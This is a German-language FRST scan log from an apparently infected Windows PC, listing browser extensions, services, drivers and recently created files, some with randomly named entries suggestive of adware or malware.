FF HKLM-x32\...\Firefox\Extensions: [{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}] - C:\Program Files\groover240120161838\Firefox\{2B9C1FFD-0F35-4D84-96A4-266DBFC4FCEF}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{AD00B37B-5BD6-4ED2-8964-6499F4764071}] - C:\Program Files\shopperz280120160932\Firefox\{AD00B37B-5BD6-4ED2-8964-6499F4764071}.xpi => nicht gefunden

Chrome:
=======
CHR dev: Chrome dev build erkannt! <======= ACHTUNG
CHR Profile: C:\Users\Denny\AppData\Local\Google\Chrome\User Data\Default
StartMenuInternet: Google Chrome - chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeActiveFileMonitor13.0; C:\Program Files\Adobe\Elements 13 Organizer\PhotoshopElementsFileAgent.exe [231120 2014-08-31] (Adobe Systems Incorporated)
S2 AntiVirMailService; C:\Program Files (x86)\Avira\AntiVir Desktop\avmailc7.exe [955736 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [466504 2016-03-21] (Avira Operations GmbH & Co. KG)
S2 AntiVirWebService; C:\Program Files (x86)\Avira\AntiVir Desktop\avwebg7.exe [1424880 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 AtherosSvc; C:\Program Files (x86)\Qualcomm Atheros\Bluetooth Suite\adminservice.exe [227968 2013-02-28] (Qualcomm Atheros Commnucations) [Datei ist nicht signiert]
R2 CCDMonitorService; C:\Program Files (x86)\Acer\Acer Portal\CCDMonitorService.exe [2797312 2013-12-04] (Acer Incorporated)
S3 ePowerSvc; C:\Program Files\Acer\Acer Power Management\ePowerSvc.exe [660040 2013-01-18] (Acer Incorporated)
R2 EpsonCustomerResearchParticipation; C:\Program Files\EPSON\EpsonCustomerResearchParticipation\EPCP.exe [676336 2015-09-03] (SEIKO EPSON CORPORATION)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128896 2013-02-18] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165760 2013-02-18] (Intel Corporation)
R2 LMSvc; C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe [431656 2013-03-15] (Acer Incorporate)
R2 MPCProtectService; C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe [349152 2016-01-28] (DotC United Inc)
R2 Samsung Link Service; C:\Program Files\Samsung\Samsung Link\Samsung Link.exe [609632 2014-03-13] (Copyright 2013 SAMSUNG)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [366552 2015-07-07] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23824 2015-07-07] (Microsoft Corporation)
S2 Arygnarj; "C:\Users\Denny\AppData\Roaming\FeykfeCekd\Nohlinbi.exe" -cms [X]
S2 Fuelf; "C:\Users\Denny\AppData\Roaming\ChnuutEjuryqh\Syyjj.exe" -cms [X]
S3 IDriverT; "C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [128664 2016-03-21] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\system32\DRIVERS\avipbb.sys [137952 2016-03-21] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\system32\DRIVERS\avkmgr.sys [35488 2016-03-21] (Avira Operations GmbH & Co. KG)
R2 avnetflt; C:\Windows\system32\DRIVERS\avnetflt.sys [68936 2016-03-21] (Avira Operations GmbH & Co. KG)
S3 BTATH_LWFLT; C:\Windows\system32\DRIVERS\btath_lwflt.sys [77464 2013-02-28] (Qualcomm Atheros)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
R3 LMDriver; C:\Windows\System32\drivers\LMDriver.sys [21360 2013-01-10] (Acer Incorporated)
R1 MPCKpt; C:\Windows\System32\DRIVERS\MPCKpt.sys [60136 2016-01-28] (DotC United Inc)
R0 PxHlpa64; C:\Windows\System32\drivers\PxHlpa64.sys [56336 2013-09-03] (Corel Corporation)
S3 QRDCIO; C:\Windows\System32\drivers\QRDCIO.sys [9728 2009-10-20] (QUANTA)
R3 RadioShim; C:\Windows\System32\drivers\RadioShim.sys [15704 2013-01-10] (Acer Incorporated)
R3 RTSPER; C:\Windows\system32\DRIVERS\RtsPer.sys [455240 2013-03-05] (RTS Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44560 2015-07-07] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [270168 2015-07-07] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114520 2015-07-07] (Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-03-29 13:01 - 2016-03-29 13:02 - 00018116 _____ C:\Users\Denny\Desktop\FRST.txt
2016-03-29 12:52 - 2016-03-29 13:00 - 00231358 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.52.00_log.txt
2016-03-29 12:50 - 2016-03-29 12:51 - 00008896 _____ C:\TDSSKiller.3.1.0.9_29.03.2016_12.50.27_log.txt
2016-03-29 12:49 - 2016-03-29 12:50 - 04727984 _____ (Kaspersky Lab ZAO) C:\Users\Denny\Desktop\tdsskiller.exe
2016-03-29 12:45 - 2016-03-29 12:45 - 00000144 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-03-29 12:45 - 2016-03-29 12:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
2016-03-28 23:46 - 2016-03-28 23:58 - 00000000 ____D C:\Users\Denny\Desktop\Infos
2016-03-28 23:36 - 2016-03-28 23:37 - 00031180 _____ C:\Users\Denny\Downloads\Addition.txt
2016-03-28 23:34 - 2016-03-29 13:01 - 00000000 ____D C:\FRST
2016-03-28 23:34 - 2016-03-28 23:37 - 00051376 _____ C:\Users\Denny\Downloads\FRST.txt
2016-03-28 23:33 - 2016-03-28 23:33 - 02374144 _____ (Farbar) C:\Users\Denny\Desktop\FRST64.exe
2016-03-28 23:32 - 2016-03-28 23:32 - 01725440 _____ (Farbar) C:\Users\Denny\Downloads\FRST.exe
2016-03-28 23:18 - 2016-03-28 23:28 - 00003594 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1569062512-718196537-2772323438-500
2016-03-28 23:18 - 2016-03-28 23:18 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Avira
2016-03-28 23:10 - 2016-03-28 23:24 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Local\Packages
2016-03-28 23:10 - 2016-03-28 23:10 - 00001454 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2016-03-28 23:10 - 2016-03-28 23:10 - 00000020 ___SH C:\Users\Administrator.Schneider\ntuser.ini
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Vorlagen
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Startmenü
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Netzwerkumgebung
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Lokale Einstellungen
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Eigene Dateien
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Druckumgebung
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Videos
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Musik
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Documents\Eigene Bilder
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Verlauf
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\AppData\Local\Anwendungsdaten
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 _SHDL C:\Users\Administrator.Schneider\Anwendungsdaten
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 __SHD C:\Users\Administrator\IntelGraphicsProfiles
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Adobe
2016-03-28 23:10 - 2016-03-28 23:10 - 00000000 ____D C:\Users\Administrator.Schneider
2016-03-28 23:10 - 2014-03-29 08:08 - 00000000 ____D C:\Users\Administrator.Schneider\AppData\Roaming\Macromedia
2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-03-28 23:10 - 2014-02-22 06:37 - 00000369 _____ C:\Users\Administrator.Schneider\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-03-22 02:54 - 2016-03-22 02:54 - 01610352 _____ (Malwarebytes) C:\Users\Denny\Downloads\JRT.exe
2016-03-22 00:31 - 2016-03-22 00:31 - 01474568 _____ C:\Users\Denny\Downloads\BitDefender Adware Removal Tool - CHIP-Installer.exe
2016-03-22 00:21 - 2016-03-22 00:21 - 00001135 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2016-03-22 00:21 - 2016-03-22 00:21 - 00001123 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2016-03-22 00:21 - 2016-03-22 00:21 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-03-21 23:58 - 2016-03-21 23:58 - 00242376 _____ C:\Users\Denny\Downloads\Firefox Setup Stub 45.0.1.exe
2016-03-21 23:26 - 2016-02-20 17:45 - 01373184 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 01168896 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00696832 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00689152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00499200 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-21 23:26 - 2016-02-20 17:45 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-03-21 23:26 - 2016-02-05 21:06 - 00046768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-03-21 23:26 - 2016-01-24 20:19 - 00419160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-03-21 23:26 - 2016-01-24 20:19 - 00378712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2016-03-21 23:26 - 2016-01-24 20:19 - 00331608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Classpnp.sys
2016-03-21 23:26 - 2016-01-24 13:57 - 01335296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-03-21 23:26 - 2016-01-24 13:45 - 01063424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mispace.dll
2016-03-21 23:26 - 2016-01-09 03:38 - 00091992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbehci.sys
2016-03-21 23:26 - 2016-01-06 20:25 - 00416768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\srv.sys
2016-03-21 23:23 - 2016-02-06 18:58 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-03-21 23:23 - 2016-02-06 18:32 - 00801792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-03-21 23:23 - 2016-01-10 18:41 - 01707008 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2016-03-21 23:23 - 2016-01-10 18:31 - 01344512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comsvcs.dll
2016-03-21 23:23 - 2016-01-09 03:49 - 00218448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll
2016-03-21 23:23 - 2016-01-09 03:49 - 00192120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll
2016-03-21 23:23 - 2016-01-07 01:46 - 00148752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscapi.dll
2016-03-21 23:23 - 2016-01-07 01:45 - 00177712 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscapi.dll
2016-03-21 23:23 - 2016-01-06 18:47 - 00146944 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-03-21 23:23 - 2015-12-30 22:49 - 00470360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2016-03-21 23:23 - 2015-12-20 16:57 - 00839168 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-21 23:23 - 2015-12-20 16:43 - 00696320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-21 23:23 - 2015-11-19 16:33 - 00994760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2016-03-21 23:23 - 2015-11-19 16:26 - 00922432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2016-03-21 23:13 - 2016-03-21 23:13 - 01530368 _____ C:\Users\Denny\Desktop\adwcleaner_5.105.exe
2016-03-21 22:54 - 2016-03-22 02:07 - 00000000 ____D C:\AdwCleaner
2016-03-21 22:27 - 2016-03-21 22:36 - 00000000 ____D C:\Users\Denny\Desktop\Pferd
2016-03-21 22:23 - 2016-03-21 22:23 - 00000000 ____D 
C:\WINDOWS\system32\diee 2016-03-21 18:50 - 2016-03-21 18:50 - 600300950 _____ C:\WINDOWS\MEMORY.DMP 2016-03-21 18:50 - 2016-03-21 18:50 - 00284928 _____ C:\WINDOWS\Minidump\032116-30421-01.dmp 2016-03-21 18:44 - 2016-01-15 18:56 - 02487296 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll 2016-03-21 18:44 - 2016-01-15 18:45 - 01482240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\storagewmi.dll 2016-03-21 18:44 - 2016-01-05 17:00 - 00570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2016-03-21 18:44 - 2015-12-20 16:56 - 00616960 _____ (Microsoft Corporation) C:\WINDOWS\system32\msra.exe 2016-03-21 18:37 - 2016-03-21 18:37 - 00001198 _____ C:\Users\Public\Desktop\Avira Antivirus.lnk 2016-03-21 18:37 - 2016-03-21 18:37 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira 2016-03-21 18:24 - 2016-03-21 18:24 - 00000000 ____D C:\WINDOWS\system32\ebo 2016-03-21 18:16 - 2016-03-28 23:05 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Leihjuef 2016-03-21 18:15 - 2016-03-21 18:15 - 00000000 ____D C:\Users\Denny\AppData\Local\app 2016-03-21 18:14 - 2016-03-21 18:43 - 00000000 ____D C:\Users\Denny\AppData\Roaming\Avira 2016-03-21 18:10 - 2016-03-21 18:10 - 00000000 ____D C:\WINDOWS\system32\oha 2016-03-21 18:07 - 2016-03-21 18:35 - 00000000 ____D C:\ProgramData\Avira 2016-03-21 18:07 - 2016-03-21 18:34 - 00137952 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avipbb.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00128664 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avgntflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00068936 _____ (Avira Operations GmbH & Co. KG) C:\WINDOWS\system32\Drivers\avnetflt.sys 2016-03-21 18:07 - 2016-03-21 18:34 - 00035488 _____ (Avira Operations GmbH & Co. 
KG) C:\WINDOWS\system32\Drivers\avkmgr.sys 2016-03-21 18:07 - 2016-03-21 18:07 - 00000000 ____D C:\Program Files (x86)\Avira 2016-03-21 17:38 - 2016-03-08 09:00 - 00829944 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-03-21 17:38 - 2016-03-08 09:00 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-03-21 17:33 - 2016-03-21 17:33 - 00000000 ____D C:\WINDOWS\system32\ahua 2016-03-21 16:28 - 2016-02-12 21:14 - 00136904 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe 2016-03-21 16:28 - 2016-02-12 17:14 - 03708416 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll 2016-03-21 16:28 - 2016-02-12 16:55 - 00409088 _____ (Microsoft Corporation) C:\WINDOWS\system32\WUSettingsProvider.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00095744 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:54 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:51 - 00124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2016-03-21 16:28 - 2016-02-12 16:51 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe 2016-03-21 16:28 - 2016-02-12 16:48 - 02244096 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll 2016-03-21 16:28 - 2016-02-12 16:47 - 00897024 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll 2016-03-21 16:28 - 2016-02-12 16:46 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2016-03-21 16:24 - 2016-02-08 23:05 - 20352512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:34 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2016-03-21 16:24 - 
2016-02-08 22:29 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll 2016-03-21 16:24 - 2016-02-08 22:10 - 04611072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-03-21 16:24 - 2016-02-08 22:05 - 25816576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2016-03-21 16:24 - 2016-02-08 22:03 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 13012480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-03-21 16:24 - 2016-02-08 22:02 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 22:01 - 02050560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 21:43 - 02121216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-03-21 16:24 - 2016-02-08 20:27 - 02887680 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll 2016-03-21 16:24 - 2016-02-08 20:26 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2016-03-21 16:24 - 2016-02-08 20:16 - 06052352 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2016-03-21 16:24 - 2016-02-08 20:14 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll 2016-03-21 16:24 - 2016-02-08 20:13 - 00817664 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript.dll 2016-03-21 16:24 - 2016-02-08 19:42 - 01032704 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll 2016-03-21 16:24 - 2016-02-08 19:37 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll 2016-03-21 16:24 - 2016-02-08 19:34 - 00798720 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 14613504 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2016-03-21 16:24 - 2016-02-08 19:33 - 02123264 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl 2016-03-21 16:24 - 2016-02-08 19:19 - 02597376 _____ 
(Microsoft Corporation) C:\WINDOWS\system32\wininet.dll 2016-03-21 16:24 - 2016-02-08 19:15 - 02880000 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll 2016-03-21 16:24 - 2016-02-08 19:07 - 01546752 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll 2016-03-21 16:24 - 2016-02-08 18:55 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 22:39 - 00496640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2016-03-21 16:23 - 2016-02-08 22:28 - 00663552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll 2016-03-21 16:23 - 2016-02-08 22:07 - 00880128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-03-21 16:23 - 2016-02-08 21:39 - 01311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-03-21 16:23 - 2016-02-08 21:38 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll 2016-03-21 16:23 - 2016-02-08 19:51 - 00092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00869576 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:21 - 00678600 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00875720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcr120_clr0400.dll 2016-03-21 16:19 - 2016-02-11 16:20 - 00536776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvcp120_clr0400.dll 2016-03-21 16:19 - 2016-02-05 16:59 - 07784960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:55 - 05264384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2016-03-21 16:19 - 2016-02-05 16:48 - 07075840 _____ (Microsoft Corporation) C:\WINDOWS\system32\glcndFilter.dll 2016-03-21 16:19 - 2016-02-05 16:47 - 05268480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\glcndFilter.dll 2016-03-21 16:18 - 
2016-02-03 22:37 - 01661576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2016-03-21 16:18 - 2016-02-03 22:36 - 01212248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2016-03-21 16:18 - 2016-02-03 17:09 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll 2016-03-21 16:18 - 2016-02-03 17:00 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll 2016-03-21 16:13 - 2016-02-06 20:08 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll 2016-03-21 16:13 - 2016-02-05 21:07 - 00292696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 21:07 - 00243032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMASF.DLL 2016-03-21 16:13 - 2016-02-05 17:03 - 15432704 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll 2016-03-21 16:13 - 2016-02-05 17:00 - 13318144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll 2016-03-21 16:13 - 2016-02-04 20:18 - 04174336 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys 2016-03-21 16:13 - 2016-02-04 20:18 - 00358912 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll 2016-03-21 16:13 - 2016-02-04 20:12 - 00044032 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:44 - 00301568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll 2016-03-21 16:13 - 2016-02-04 19:39 - 00035840 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll 2016-03-21 16:13 - 2016-02-04 19:24 - 00603648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll 2016-03-21 16:13 - 2016-02-04 19:02 - 00483328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll 2016-03-21 16:13 - 2016-01-31 21:16 - 00148832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS 2016-03-09 18:41 - 2016-03-09 18:41 - 00000000 ____D C:\WINDOWS\system32\wof 
2016-03-09 18:34 - 2016-03-09 18:34 - 00003336 _____ C:\WINDOWS\System32\Tasks\Foxvohji
2016-03-09 09:51 - 2016-03-09 09:51 - 00000000 ____D C:\Users\Denny\AppData\Local\VirtualStore
2016-03-09 09:38 - 2016-03-09 09:38 - 00000000 ____D C:\WINDOWS\system32\wyfw
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\tob
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\riv
2016-03-09 02:47 - 2016-03-09 02:47 - 00000000 ____D C:\WINDOWS\system32\baf
2016-03-08 14:19 - 2016-03-21 15:58 - 00000000 ____D C:\Users\Denny\Desktop\bewerbung philipp
2016-03-08 14:00 - 2016-03-08 14:00 - 00137615 _____ C:\Users\Denny\Desktop\EPSON002.png.PDF
2016-03-08 13:19 - 2016-03-08 13:19 - 05404312 _____ (Avira Operations GmbH & Co. KG) C:\Users\Denny\Downloads\avira_de_av_56deb4d03eff9__ws.exe
2016-03-08 12:16 - 2016-03-08 12:16 - 00000000 ____D C:\Program Files (x86)\DATA BECKER
2016-03-08 12:16 - 1998-11-17 14:44 - 00328704 _____ (InstallShield Software Corporation ) C:\WINDOWS\IsUn0407.exe
2016-03-08 12:13 - 2016-03-08 12:13 - 01470472 _____ C:\Users\Denny\Downloads\PopUp Banner Blocker - CHIP-Installer.exe
2016-03-08 12:06 - 2016-03-09 10:16 - 00001231 _____ C:\Users\Denny\Desktop\Continue Last version Installation.lnk
2016-03-08 11:46 - 2016-03-08 11:59 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim(1).exe
2016-03-08 11:44 - 2016-03-08 11:46 - 05600464 _____ (Piriform Ltd) C:\Users\Denny\Downloads\ccsetup515_slim.exe
2016-03-07 22:16 - 2016-03-07 22:16 - 00000000 ____D C:\Users\Denny\AppData\Local\3810282D-6C19-47B0-8283-5C6C29A7E108
2016-03-07 21:40 - 2016-03-07 21:40 - 00003338 _____ C:\WINDOWS\System32\Tasks\Conbyg
